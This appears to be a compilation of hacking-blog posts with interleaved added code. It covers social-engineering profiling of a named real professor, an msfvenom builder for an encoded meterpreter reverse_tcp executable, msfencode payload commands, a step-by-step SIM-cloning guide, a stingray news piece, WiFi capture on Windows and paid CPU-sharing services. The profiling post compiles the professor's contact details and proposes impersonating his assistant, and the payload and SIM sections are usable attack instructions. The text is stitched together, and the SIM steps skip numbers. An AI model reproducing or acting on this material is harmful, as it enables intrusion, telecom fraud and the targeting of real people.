Building Profiles for a Social Engineering Attack

The key to a successful social engineering engagement is trust. If you can win someone's trust quickly, you can usually obtain whatever information you want. People are naturally suspicious of strangers and are reluctant to give out details about themselves or their company. If you have done your research, however, and the information you present to them rests on verifiable facts, you can convince them and win their trust much faster. In this article we will see how to build a profile of someone we know nothing about.

Let's say our client is MIT (Massachusetts Institute of Technology) and we have no information about them. The first step is to discover email addresses and social media profiles associated with the organisation. We have two options here: the tool theHarvester, or the Metasploit auxiliary module search_email_collector.

The Metasploit email collector module is simple to use. We only need to set the DOMAIN option to our target's domain and it searches Bing, Yahoo and Google for valid email addresses.

Our target is MIT, so the domain we set is mit.edu. Below is a sample of our results.

 

theHarvester, on the other hand, gives us more options: besides email addresses it can also search for profiles on social networks such as Google+ and LinkedIn. The next image shows the command we executed.

Below is a sample of the email addresses theHarvester discovered. We can of course combine these results with those of the Metasploit module.

We can also search professional networks such as LinkedIn for profiles related to mit.edu. We discovered two profiles.

So we now have a lot of email addresses and two names. Cross-referencing the names with the output of the Metasploit email collector, we find an address that most likely corresponds to the Walter Lewin profile: lewin@mit.edu. You can see it in the results below.
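The cross-referencing step above can be done programmatically once the two tools' outputs are exported. The script below is an added example, not code from the original article or from theHarvester or Metasploit: it merges the two address lists, tries the common address conventions for every name found on LinkedIn, and uses the convention that matched most often to predict addresses for the names that had no hit. The address lists, the names and the example.edu domain are constructed stand-ins for real tool output.

```python
"""Correlate harvested e-mail addresses with names found on social networks.

Added example (not part of the original article). The address lists below are
constructed stand-ins for theHarvester and search_email_collector output; the
names and the example.edu domain are invented, not real people.
"""
from collections import Counter

# Constructed sample output of the two tools (real runs return hundreds of rows)
HARVESTER_OUTPUT = ["jdoe@example.edu", "Admissions@Example.edu",
                    "rroe@example.edu", "webmaster@example.edu"]
MSF_OUTPUT = ["jdoe@example.edu", "bob.smith@example.edu", "rroe@example.edu"]
# Constructed names, e.g. from the LinkedIn search
NAMES = ["Jane Doe", "Richard Roe", "Bob Smith", "Alice Johnson"]
DOMAIN = "example.edu"

# Common corporate/academic address conventions, tried in this order
EMAIL_FORMATS = {
    "last":       lambda first, last: last,
    "first":      lambda first, last: first,
    "first.last": lambda first, last: f"{first}.{last}",
    "flast":      lambda first, last: first[0] + last,
    "first_last": lambda first, last: f"{first}_{last}",
    "firstl":     lambda first, last: first + last[0],
}


def merge_results(*sources):
    """Union of the tools' outputs, lower-cased and de-duplicated."""
    return sorted({a.strip().lower() for src in sources for a in src if "@" in a})


def candidates(name, domain):
    """Every address the name could have under the known formats."""
    parts = name.lower().split()
    first, last = parts[0], parts[-1]
    return {fmt: f"{build(first, last)}@{domain}" for fmt, build in EMAIL_FORMATS.items()}


def match_names(names, emails, domain):
    """Map each name to the harvested address (and format) it matches, if any."""
    known = set(emails)
    matches = {}
    for name in names:
        for fmt, addr in candidates(name, domain).items():
            if addr in known:
                matches[name] = (addr, fmt)
                break
    return matches


def dominant_format(matches):
    """The address convention seen most often among confirmed matches."""
    counts = Counter(fmt for _addr, fmt in matches.values())
    return counts.most_common(1)[0][0] if counts else None


def guess_unmatched(names, matches, domain):
    """For names with no harvested address, predict one from the dominant format."""
    fmt = dominant_format(matches)
    if fmt is None:
        return {}
    return {name: candidates(name, domain)[fmt] for name in names if name not in matches}


if __name__ == "__main__":
    merged = merge_results(HARVESTER_OUTPUT, MSF_OUTPUT)
    found = match_names(NAMES, merged, DOMAIN)
    for name, (addr, fmt) in found.items():
        print(f"{name:15} -> {addr}  ({fmt})")
    for name, addr in guess_unmatched(NAMES, found, DOMAIN).items():
        print(f"{name:15} -> {addr}  (guessed, unverified)")
```

Replace HARVESTER_OUTPUT and MSF_OUTPUT with the exported lists from the real runs. A guessed address is only a hypothesis until something else confirms it (a directory page, a bounce, a reply); the confirmed matches are what you build the pretext on.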

 

Now that we have a name and an email address it is much easier to search the web and collect as much information as possible about this particular person. We can start, for example, with his LinkedIn profile.

We can use the address lewin@mit.edu to find his Facebook profile.

The information we can retrieve from Facebook without being friends is limited. If we pose as an MIT faculty member, however, we can send a friend request and might convince him to add us, which gives access to far more personal information. Another good source of information is the website pipl.com.

 

As you can see we have found his age, his job, his personal web space, his Amazon wish list and a web page that holds the professor's profile. The same search also gave us his work phone number and office room.

We can verify these details simply by locating his personal MIT web page.

Apart from phone numbers and addresses, the page above also reveals the professor's assistant. That helps us in several ways: for instance, we can send him an email that appears to come from his assistant. The professor will believe it comes from someone he trusts and will answer our questions more readily. Whether such a spoofed message is delivered depends on the target domain's SPF and DMARC policies, so check those before relying on a forged From address.

Basically, the idea when building a profile of the person you intend to social engineer is to gather as much information as possible: interests and activities, friends and colleagues, email addresses, phone numbers and so on. Keeping all of it in your notes lets you construct a scenario that will actually work.

Conclusion

Exposure of personal information is an advantage for every social engineer. Anything you post on the Internet will effectively stay there forever, so before you post something personal, think twice about whether it is really necessary for other people to know about you and your activities. Using different email addresses and usernames across services also makes the social engineer's job much harder, because it breaks the kind of cross-referencing shown above.

Disclaimer

Pentestlab holds Professor Walter Lewin in high regard, respects his work and contribution to science, and does not in any way encourage readers to use this personal information to perform illegal activities against him.


Create Executable Payloads Automatically

This script builds a single Windows executable that carries a reverse_tcp stage for each of three different ports (the handler listens on all three), with every stage encoded with the shikata_ga_nai encoder. Each stage is chained onto the previous one with msfvenom's -c (--add-code) option. By changing the -f option the same script can produce other formats, such as a .vba macro. The source code is below.

Source Code:

#!/bin/bash
# Simple builder: one executable that carries a reverse_tcp stage for every
# port in LPORTS, each stage encoded with shikata_ga_nai and chained onto the
# previous one with msfvenom's -c (--add-code) option.
LHOST="192.168.91.135"
LPORTS=(4444 5555 6666)
PAYLOAD="windows/meterpreter/reverse_tcp"
ENCODER="x86/shikata_ga_nai"
N=${#LPORTS[@]}

rm -f /tmp/msf.raw /tmp/msf1.raw
echo "Building..."

# First stage: raw shellcode for the first port
echo "Port: ${LPORTS[0]}"
msfvenom -p "$PAYLOAD" -f raw -e "$ENCODER" LHOST="$LHOST" LPORT="${LPORTS[0]}" EXITFUNC=thread > /tmp/msf.raw

# Middle stages: add one port at a time onto the accumulated raw blob
for ((i = 1; i < N - 1; i++)); do
    echo "Port: ${LPORTS[$i]}"
    msfvenom -p "$PAYLOAD" -f raw -e "$ENCODER" LHOST="$LHOST" LPORT="${LPORTS[$i]}" EXITFUNC=thread -c /tmp/msf.raw > /tmp/msf1.raw
    mv /tmp/msf1.raw /tmp/msf.raw
done

# Last stage is written straight to the output file.
# Change -f exe to -f vba in order to create a VBA macro instead.
echo "Port: ${LPORTS[$((N - 1))]}"
msfvenom -p "$PAYLOAD" -f exe -e "$ENCODER" LHOST="$LHOST" LPORT="${LPORTS[$((N - 1))]}" EXITFUNC=thread -c /tmp/msf.raw > msf.exe
rm -f /tmp/msf.raw
echo "Done!"

Original Author: Michele

First posted here

SOURCE: https://pentestlab.wordpress.com

MSFencode Commands

Note: msfpayload and msfencode were removed from the Metasploit Framework in 2015; msfvenom provides the same functionality (-e encoder, -i iterations, -b bad characters, -f format). The commands below document the options they were built around.

msfencode -h

Display the help file of msfencode

msfencode -l

Lists the available encoders

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)

Output format for the encoded buffer

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Uses the shikata_ga_nai encoder to encode payload.raw five times (-c is the iteration count) and writes the result to a file called encoded_payload.exe

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Creation of a multi-encoded payload: the raw payload (R) is piped through five passes of x86/countdown and then five passes of shikata_ga_nai, and the final pass writes an executable

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation
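What the "-c 5" iterations in the commands above, and the shikata_ga_nai chain in the payload builder script, actually do to the bytes is easiest to see in a small model. The following is an added example and not Metasploit code: it reproduces only the additive-feedback XOR arithmetic that the shikata_ga_nai decoder stub performs (XOR each 32-bit word with a key, then advance the key by adding the decoded word) and applies it for several passes with per-pass keys chosen to avoid bad characters, the way -b does. It does not generate the polymorphic x86 decoder stub that the real encoder prepends, so its output is not executable shellcode. The sample bytes are a constructed stand-in for payload.raw.

```python
"""Model of the additive-feedback XOR core behind x86/shikata_ga_nai.

Added example, not Metasploit code. It reproduces only the arithmetic the
decoder stub performs (XOR each dword with a key, then advance the key by
adding the decoded dword); the polymorphic x86 decoder stub that msfencode
prepends, and which makes the output position-independent code, is not
generated here. The sample shellcode is a constructed stand-in for payload.raw.
"""
import random
import struct

MASK = 0xFFFFFFFF
# Constructed 23-byte sample standing in for payload.raw
SAMPLE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")


def _pad(data):
    """The encoder works on 32-bit words, so pad with NOPs to a multiple of 4."""
    return data + b"\x90" * (-len(data) % 4)


def encode_once(data, key):
    """One encoder pass: out = dword ^ key; key = (key + dword) mod 2**32."""
    out = bytearray()
    for (dword,) in struct.iter_unpack("<I", _pad(data)):
        out += struct.pack("<I", dword ^ key)
        key = (key + dword) & MASK
    return bytes(out)


def decode_once(data, key):
    """What the decoder stub does at run time (it feeds back the decoded word)."""
    out = bytearray()
    for (cword,) in struct.iter_unpack("<I", data):
        dword = cword ^ key
        out += struct.pack("<I", dword)
        key = (key + dword) & MASK
    return bytes(out)


def encode(data, keys):
    """'-c N' style: N passes, each with its own key, outermost pass last."""
    for key in keys:
        data = encode_once(data, key)
    return data


def decode(data, keys):
    """Undo the passes in reverse order."""
    for key in reversed(keys):
        data = decode_once(data, key)
    return data


def has_bad_chars(data, bad):
    return any(b in data for b in bad)


def pick_keys(data, passes, bad=b"\x00", seed=None, tries=10000):
    """Choose one key per pass so that neither the key (it lives in the decoder
    stub) nor the pass output contains a forbidden byte, like msfencode -b."""
    rng = random.Random(seed)
    keys = []
    for _ in range(passes):
        for _ in range(tries):
            key = rng.getrandbits(32)
            if has_bad_chars(struct.pack("<I", key), bad):
                continue
            candidate = encode_once(data, key)
            if not has_bad_chars(candidate, bad):
                keys.append(key)
                data = candidate
                break
        else:
            raise ValueError("no key avoids the bad characters for this input")
    return keys


if __name__ == "__main__":
    keys = pick_keys(SAMPLE, passes=5, bad=b"\x00\x0a\x0d", seed=1)
    blob = encode(SAMPLE, keys)
    print("keys    :", [hex(k) for k in keys])
    print("encoded :", blob.hex())
    print("restored:", decode(blob, keys) == _pad(SAMPLE))
```

Two things the model makes visible. First, every extra pass only adds another decoder loop in front of the payload; the keys are stored in those loops, so the encoding is reversible by anyone holding the bytes, and iterating it is a bad-character and signature-variation tool, not obfuscation that survives emulation by an antivirus engine. Second, a pass can fail if no key keeps the bad characters out, which is exactly the "failed to encode" error msfencode reports on short inputs with long bad-character lists.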

Reference:

From the book Metasploit – The Penetration Testers Guide

How to clone SIM Card

NOTE: The following information is for educational purposes only!
The following guide describes how clones are made of SIM cards used in India, which means you can use one number with two SIM cards at the same time.
Before I start off with this guide, I would like to make one thing clear: SIM cloning is illegal. So please use this guide for personal purposes only; do not use it for cheating.
First, a little introduction to the SIM card:
A SIM card holds two secret values, the IMSI (International Mobile Subscriber Identity) and the Ki (the subscriber's 128-bit authentication key). The operator keeps the same pair in its subscriber database, uses them to identify the subscriber and, through a challenge-response exchange, to authenticate the card; billing is tied to the same identity. What we do in SIM cloning is extract these two values from the SIM and program them into a blank smart card, often called a wafer. Since the operator authenticates the SIM purely on these values, the clone is indistinguishable from the original. This reliance on a secret that can be extracted from the card is a well-known weakness of GSM.
Now, which SIM cards can be cloned:
SIM cards implement one of three authentication algorithms: COMP128v1, COMP128v2 or COMP128v3. Currently only COMP128v1 cards can be cloned, since this is the only one of the three that has been broken (a chosen-challenge attack published in 1998 recovers Ki from the card). The original author estimates that about 70% of SIM cards in use are COMP128v1; that figure is not sourced.
OK, that's it about the background. Now let's get to the main part:
1. Buy a SIM card reader.
2. Get a blank SIM card or "super SIM" card.
5. Install the programs.
6. Go into phone tools, select SIM card, then select unlock SIM; it will prompt for a code.
7. Call your network provider. They will ask for your phone number, your account info, your name and your security code, and then why you want to unlock your SIM card. Just tell them you need to unlock your SIM to use it with your overseas phone, or something similar.
8. Once they give you the SIM unlock code, enter it and it will say "SIM unlocked".
9. Remove the SIM from your phone, place it in the card reader and click "read from card" in the Magic SIM program.
10. Once it says connected, select "crack SIM" in the toolbar. Tick "strong Ki" and all of the other find options, then click start.
11. Once your Ki is found and the crack is finished, click file, save as, and save your cracked SIM info to a file.
12. IMPORTANT! You must click disconnect from the file menu or you will ruin your SIM card. Once it says disconnected, remove the SIM, put it in your phone and check that it still works. It should; if not, you either did not unlock your SIM, or you tried to copy it instead of crack and save.
13. Insert the blank 3G card. Use the other program, not Magic SIM, at this point.
14. Click connect.
15. It will say "no info found" if the card is truly blank.
16. Select write to SIM. It will prompt you to select a .dat file; select the one you saved before, then click start. Writing takes about 10 minutes; once complete it will ask for a security code. Enter the security code the network provider gave you, then click finish.
17. Your card is cloned. If you try to make two calls at the same time, one will go through and the other will say "call failed"; both phones will get the same text and voice messages and receive the same calls, but only one can talk at a time.
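The reason steps 9 to 16 amount to a working clone is the authentication exchange the guide mentions only in passing. The model below is an added example, not part of the original guide: it plays both sides of the GSM challenge-response (the operator's authentication centre sends a random RAND, the card answers with SRES computed from Ki, the network compares) and shows that a card holding a copied IMSI/Ki pair is accepted exactly like the original, while a card with the right IMSI but a guessed Ki is not. HMAC-SHA256 stands in for the real A3/A8 algorithm (COMP128) as a placeholder PRF, an assumption made because the point is the protocol, not the cipher; all identifiers and keys are constructed.

```python
"""GSM challenge-response authentication and why an extracted Ki yields a clone.

Added example, not from the original guide. The real A3/A8 algorithm on these
cards is COMP128; here HMAC-SHA256 stands in as a placeholder PRF (assumption)
because the point is the protocol, not the cipher: the network never sees Ki,
it only checks that the card can answer a random challenge with it. All
identifiers and keys below are constructed.
"""
import hashlib
import hmac
import os


def a3a8(ki, rand):
    """Placeholder for COMP128: returns (SRES, Kc) from the 128-bit Ki and RAND."""
    digest = hmac.new(ki, rand, hashlib.sha256).digest()
    return digest[:4], digest[4:12]  # SRES is 32 bits, Kc is 64 bits


class SimCard:
    """What the handset sees: an IMSI and a card that answers RUN GSM ALGORITHM."""
    def __init__(self, imsi, ki):
        self.imsi = imsi
        self._ki = ki  # on an unbroken card this value never leaves the chip

    def run_gsm_algorithm(self, rand):
        return a3a8(self._ki, rand)

    def clone(self):
        """Only possible once Ki has been extracted (the COMP128v1 attack)."""
        return SimCard(self.imsi, self._ki)


class AuthenticationCentre:
    """Operator side: the database of IMSI -> Ki and the challenge logic."""
    def __init__(self):
        self._subscribers = {}

    def provision(self, imsi, ki):
        self._subscribers[imsi] = ki

    def authenticate(self, sim, rand=None):
        """Send RAND, compare the card's SRES with our own computation."""
        if sim.imsi not in self._subscribers:
            return False
        rand = rand or os.urandom(16)
        expected_sres, _kc = a3a8(self._subscribers[sim.imsi], rand)
        sres, _kc = sim.run_gsm_algorithm(rand)
        return hmac.compare_digest(sres, expected_sres)


def demo():
    """Returns (genuine_ok, clone_ok, forged_ok) for the three card types."""
    auc = AuthenticationCentre()
    imsi, ki = "404010123456789", bytes(range(16))  # constructed subscriber
    auc.provision(imsi, ki)
    genuine = SimCard(imsi, ki)
    cloned = genuine.clone()                 # same IMSI, same Ki
    forged = SimCard(imsi, os.urandom(16))   # right IMSI, guessed Ki
    return (auc.authenticate(genuine), auc.authenticate(cloned), auc.authenticate(forged))


if __name__ == "__main__":
    print("genuine, clone, forged ->", demo())
```

The network has no way to tell the two accepted cards apart, which is why the guide's step 17 behaviour (both phones receive everything, one call at a time) follows directly from the protocol. The only defence is keeping Ki inside the card, which is what the later COMP128 versions restored.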
Source: hackaholik.blogspot.in
Image Source: mobiledit.com

Fake Cell Phone Tower Used to Track Your Every Move

Over the past 12-18 months, there has been an increased level of scrutiny applied to the various ways local, state, and federal law enforcement officials track and monitor the lives of ordinary citizens. One tool that has come under increasing fire is the so-called stingray, a fake cell phone tower that law enforcement officials deploy to track a suspect, often without a warrant or any other formal approval.

A stingray is a false cell phone tower that can force phones in a geographical area to connect to it. Once these devices connect, the stingray can be used either to home in on the target's location or, with some models, to eavesdrop on conversations, text messages and web browser activity. It is not clear how much the police cooperate with the cell phone carriers on this: in at least some cases the police have gone to carriers with requests for information, while in others they seem to have taken a brute-force approach, dumping the data of every single user on a given tower and then sorting through it to find the parties they are interested in tracking. Stingrays can be used to force the phone to give up its subscriber identifiers, making it fairly easy for the police to match devices and account holders.

Stingray

The potential uses for the information are enormous. Say a murder occurs on a particular street with an estimated time of death between 2 and 4 AM. Local law enforcement would have an obvious interest in compelling cell phone companies to turn over the records of every cell phone that moved in and out of the area during that window. At rush hour this kind of information would be useless, but if the cell phone network data shows a device in the same approximate area as the murder suddenly leaving the area at high speed, that phone's owner is a potential suspect.

Virtually all the stingray devices in use across the United States are manufactured by one company, the Harris Corporation, which makes a variety of other tracking devices. Its other products can be used to conduct denial-of-service attacks on cell phones, monitor voice traffic, amplify the range and power of stingray attacks, and provide more sophisticated tools for triangulating an individual's location.

A consistent disregard for constitutional safeguards

Used properly, stingrays could be an incredibly useful tool for law enforcement, but there are enormous problems with their current deployments. Police often fail to submit a warrant request: one police department in Florida has admitted to using a stingray more than 200 times since 2010 without ever getting a warrant for its use. These devices are indiscriminate. In rare cases, such as a stolen cell phone, police may know in advance precisely which device to target, but in the majority of scenarios they are casting a wide net to see what they can find. The only indication that a phone has been trapped into connecting to a stingray may be a sudden increase in power consumption (the stingray tells the phone to run its radio at maximum transmit power).

The problems only increase from here. The Harris Corporation has an NDA (non-disclosure agreement) in place with all its customers that explicitly forbids them from disclosing the fact that they use or own a stingray device. In the aforementioned Florida case, police have acknowledged that they avoided applying for a warrant specifically so they would not have to explain the use of the stingray to a judge.

States using Stingray devices

Meanwhile, the Obama Administration, having learned its lesson from repeatedly attempting to quash the Snowden disclosures, has welcomed discussion of how these devices are being used to spy on Americans by local officials without any regard for the rule of law.

Just kidding!

The Obama Administration is actually telling police agencies to refuse FOIA requests on security grounds, or to censor such documents to the point of worthlessness. Last week, the US Marshals interfered in a case in Florida to prevent the ACLU from meeting with local police officials to discuss the use of stingray technology. According to the ACLU, the Marshals deputized the local police force, declared all materials related to stingray use to be government property, and took the records off-site.

The problem here is not necessarily the capability, but the ways in which that capability is being used. As with license plate readers, the police have eagerly embraced the idea of tracking the movements of innocent people with no regard for how that data might be misinterpreted or abused. They have signed NDAs with a company that seeks to circumvent the Freedom of Information Act, and avoided disclosing the existence of programs in order to avoid the chance of possible censure.

New technology like DNA analysis and fingerprinting has often been controversial at the outset, but this widespread mobile tracking has no analog in history. There is an ongoing campaign to blanket the US in local Freedom of Information Act requests for data on stingray use across the country; if you are interested in contributing, details are here. The goal is to map individual departments and derive an understanding of how practices differ across the nation.

 Source: extremetech.com

 

Capture WiFi traffic using Wireshark

How to capture WiFi traffic using Wireshark on Windows

Wireshark uses the libpcap or WinPcap libraries to capture network traffic; on Windows that means WinPcap. WinPcap's NDIS driver sees a wireless adapter as an ordinary Ethernet-like interface in managed mode and cannot switch it into 802.11 monitor mode, so out of the box Wireshark on Windows cannot capture raw WiFi frames. (Npcap, WinPcap's successor, now offers monitor mode on adapters whose drivers support it.)

WinPcap Capture Limitations and WiFi traffic on Wireshark

The limitation is mostly in WinPcap, not Wireshark. Wireshark does include AirPcap support; AirPcap is a special, and expensive, family of USB WiFi adapters whose drivers capture in monitor mode. Monitor mode should not be confused with promiscuous mode: promiscuous mode only delivers all frames on the network the card is associated with, whereas monitor mode delivers every 802.11 frame heard on the channel, including management and control frames, without associating to any network.

Acrylic WiFi products include an NDIS traffic capture driver that captures WiFi traffic in monitor mode on Windows, so WiFi traffic can be captured with Wireshark on Windows Vista, Windows 7, Windows 8 and Windows 8.1. The driver also adds wireless capture support on Windows to other WiFi sniffers.

NDIS Driver and WiFi interfaces on Wireshark

To make this integration possible, Acrylic installs an airpcap.dll library in the system. When Wireshark loads that library, it returns a fake list of AirPcap adapters: one AirPcap device for each integrated or external USB WiFi card.

WiFi network card using Wireshark on Windows

Through this method you can use any network analyzer compatible with AirPcap to monitor WiFi packets on Windows, including Wireshark, Cain & Abel, Elcomsoft Wireless Security Auditor and Acrylic itself. Double-clicking the interface in Wireshark opens its settings. Note that the interface exposes a link-layer header (such as radiotap) that carries per-packet radio information, including the signal level, in front of each 802.11 frame.

Wireshark NDIS WiFi interface detail on Windows

Clicking the "Wireless settings" button lets you configure advanced settings such as the WiFi channel to monitor and FCS checking. The FCS (Frame Check Sequence) is the CRC-32 checksum at the end of every 802.11 frame; with the check enabled, frames whose checksum does not match are discarded as corrupt.
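What the dissector does with that link-layer header and the FCS option is easy to reproduce offline. The script below is an added example, not code from Acrylic or Wireshark: it parses a radiotap header to pull out the signal level and channel, then recomputes the CRC-32 FCS of the 802.11 frame that follows and reports whether it matches, which is the decision the "FCS check" setting makes for you. It assumes the driver presents frames with a radiotap header, as AirPcap does; the capture bytes (a beacon for a constructed network) are built inline, and a second copy has one bit flipped to show a failing check.

```python
"""Read the radiotap link-layer header and verify the 802.11 FCS of a captured frame.

Added example, not from the Acrylic article. It parses the per-packet radio
information (signal level, channel) that a monitor-mode capture prepends to
each frame, and recomputes the FCS the "Wireless settings" check relies on.
The capture bytes are constructed inline, so it runs offline; the layout
follows the public radiotap and 802.11 definitions, not any Acrylic-specific
format (assumption: the NDIS driver exposes radiotap, as AirPcap does).
"""
import struct
import zlib

# Radiotap "present" bits handled here: bit -> (name, struct format, alignment)
RADIOTAP_FIELDS = {
    0: ("tsft", "<Q", 8),
    1: ("flags", "<B", 1),
    2: ("rate", "<B", 1),
    3: ("channel", "<HH", 2),   # frequency in MHz, channel flags
    4: ("fhss", "<BB", 1),
    5: ("dbm_antsignal", "<b", 1),
    6: ("dbm_antnoise", "<b", 1),
}
RT_FLAG_FCS = 0x10  # radiotap flags: frame includes the FCS at the end
FCS_LEN = 4


def parse_radiotap(buf):
    """Return (header length, {field: value}) for the radiotap header at buf[0:]."""
    version, _pad, length, present = struct.unpack_from("<BBHI", buf, 0)
    if version != 0:
        raise ValueError("unknown radiotap version")
    off = 8
    ext = present
    while ext & (1 << 31):           # skip extended presence words
        ext = struct.unpack_from("<I", buf, off)[0]
        off += 4
    fields = {}
    for bit in range(31):
        if not present & (1 << bit):
            continue
        if bit not in RADIOTAP_FIELDS:
            break                    # unknown field size: stop walking
        name, fmt, align = RADIOTAP_FIELDS[bit]
        off = (off + align - 1) // align * align  # fields are naturally aligned
        values = struct.unpack_from(fmt, buf, off)
        fields[name] = values[0] if len(values) == 1 else values
        off += struct.calcsize(fmt)
    return length, fields


def parse_capture(capture):
    """Radio metadata plus FCS verdict and SSID (for beacons) of one captured packet."""
    rt_len, rt = parse_radiotap(capture)
    frame = capture[rt_len:]
    info = {
        "signal_dbm": rt.get("dbm_antsignal"),
        "freq_mhz": rt.get("channel", (None, None))[0],
        "fcs_ok": None,              # None: driver stripped the FCS, nothing to check
    }
    if rt.get("flags", 0) & RT_FLAG_FCS:
        body, (fcs,) = frame[:-FCS_LEN], struct.unpack("<I", frame[-FCS_LEN:])
        info["fcs_ok"] = (zlib.crc32(body) & 0xFFFFFFFF) == fcs  # 802.11 FCS is CRC-32
        frame = body
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    info["bssid"] = frame[16:22].hex(":")       # addr3 carries the BSSID in a beacon
    if ftype == 0 and subtype == 8:             # management frame, beacon
        ies = frame[24 + 12:]                   # skip timestamp(8) interval(2) capability(2)
        if len(ies) >= 2 and ies[0] == 0:       # IE 0 = SSID
            info["ssid"] = ies[2:2 + ies[1]].decode("utf-8", "replace")
    return info


def build_sample(corrupt=False):
    """Constructed capture: radiotap header + beacon frame + FCS (optionally damaged)."""
    rt = struct.pack("<BBHI", 0, 0, 15, 0x2E)     # present: flags, rate, channel, signal
    rt += struct.pack("<BB", RT_FLAG_FCS, 2)      # flags, rate 1 Mb/s (units of 500 kb/s)
    rt += struct.pack("<HH", 2412, 0x00A0)        # channel 1, 2 GHz CCK
    rt += struct.pack("<b", -42)                  # dBm antenna signal
    bssid = bytes.fromhex("021122334455")         # constructed, locally administered
    hdr = struct.pack("<HH", 0x0080, 0) + b"\xff" * 6 + bssid + bssid + struct.pack("<H", 0x0010)
    body = struct.pack("<QHH", 0, 100, 0x0401) + bytes([0, 10]) + b"ExampleNet"
    frame = hdr + body
    fcs = struct.pack("<I", zlib.crc32(frame) & 0xFFFFFFFF)
    if corrupt:                                   # flip a bit in flight; FCS no longer matches
        frame = frame[:-1] + bytes([frame[-1] ^ 0x01])
    return rt + frame + fcs


if __name__ == "__main__":
    for label, pkt in (("good", build_sample()), ("corrupt", build_sample(corrupt=True))):
        print(label, parse_capture(pkt))
```

Leaving the FCS check off keeps corrupted frames in the capture, which is occasionally useful when a weak signal is the thing you are diagnosing (the damaged bytes still tell you which station was transmitting), but anything you feed into a decryption or analysis pipeline should be filtered on a good FCS first, since a single flipped bit silently changes the SSID, addresses or payload.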

Wireshark select channel using NDIS WiFi network card on Windows

WiFi traffic capturing using Wireshark

All in all: after installing Acrylic WiFi, launch Wireshark with Administrator privileges (right-click the Wireshark icon and select "Run as administrator") and select any NDIS WiFi network interface. In this example, the Dell integrated WiFi card (Dell Wireless 1702/b/g/n).
Wireshark Capture NDIS WiFi Windows

Video tutorial Acrylic WiFi NDIS driver with Wireshark on Windows

 


Source:https://www.acrylicwifi.com

Earn Money By Keeping Your PC ON

If I told you that you can make money while sleeping, or without doing anything at all, would you believe it? Obviously not. There are thousands of scams on the Internet that have used exactly this pitch to deceive hopeful users, so much so that nobody wants to believe there are real ways to make money online without doing anything.

But this site was created to bring you real, working tricks that make your life easier, not to deceive you in any way. So today we are describing some real ways to make money online by just turning your PC on and sitting back.

Make Money Online - While Sleeping

How is this possible?

Yes, this is the obvious question, and we are happy you are asking it. The services described here use the idle time of your CPU and pay you for it. They are not paying you for nothing: they are paying to use your CPU's computing power.

So even though you put in no extra effort, you are helping companies by providing computing power, and they pay you for it. Nobody is paid for free.

😛

Let your PC make money for you

Without taking much of your time, here are the services that actually pay you for your CPU's idle time. One caveat before the list: every one of them works by installing a program that runs in the background with your user's privileges and talks to the vendor's servers, so you are trusting that vendor with your machine. Install only from the vendor's own site, and keep an eye on what the program does with the network, the disk and your CPU.

1. Gomez PEER

Gomez PEER is a distributed computing application and the most popular service people use to share their CPU's idle time and make some money. The website provides a Java application that runs in the background and uses your system's unused resources (processing power, RAM, bandwidth) to test the performance of many of the world's most popular websites.

There are over 150,000 individuals using this service to make money. Sign up for free and help Gomez PEER make the Internet a faster, more reliable tool while making money on the side.

2. Slicify

Slicify is another platform for selling your computer's power. If you have a Windows PC, you are good to go. Sign up for free and download its Windows software to rent out your PC over the Internet when you are not using it. When someone wants to use your computer, they book it through Slicify and pay you to rent it, anywhere from a few cents to a dollar an hour.

slicify

3. CoinBeez

CoinBeez is another startup with a similar approach: some users earn money while others use the pooled CPU power for heavy computing tasks. According to CoinBeez, they are building a supercomputer to which 15,000+ users provide CPU power, for which they are paid. They rent the collected processing power to other companies.

4. Digital Generation

Like the other services, this startup uses your computer's idle time. You install Digital Generation's software like any normal application, run it and sit back. The app runs in the background using your computer's resources. You will not notice any performance decrease; all you will notice is the money increasing in your wallet.

5. IPU Services

The Idle Processor Utilization Service has been around for a long time, giving users a reason to leave their PC idle instead of turning it off after finishing their work. The service has passed 100,000 users. You earn money simply by downloading its processing software and leaving your computer on. That's it.

No purchase is necessary to earn money. Simply register (below) and download the processing software. That's it.

IPU

6. MQL 5 – Distributed Cloud Network

Directly from MQL5: "Today's computers spend most of their time idle and do not use all the features of their CPU. Now you can benefit from the spare power of your PC.

You can sell your computer's CPU time to other members of our network community for a variety of tasks like optimizing Expert Advisors optimization or developing mathematical models."

mql 5

7. RUBLIK

Get paid for doing nothing by joining the RUBLIK passive income program. This service performs GPU mining (Bitcoin mining) and uses your CPU for the same. If you are not familiar with the terms, just google "GPU mining" or "Bitcoin mining", or read the relevant Wikipedia articles.

Payment: $0.07 per 1000 solutions (nothing to do, just turn on the software).

RUBLIK

Conclusions

These services are popular, and many people earn passive income this way. Pick whichever suits you, try it, and check whether you really benefit once you account for the electricity the PC consumes while it stays on and for the fact that you are running someone else's code on your machine around the clock.

By the way, you don't always have to sit back 😉 you can perform other tasks on your PC, such as browsing, playing games or working on projects, since all the services above run in the background.

Source: techgyd.com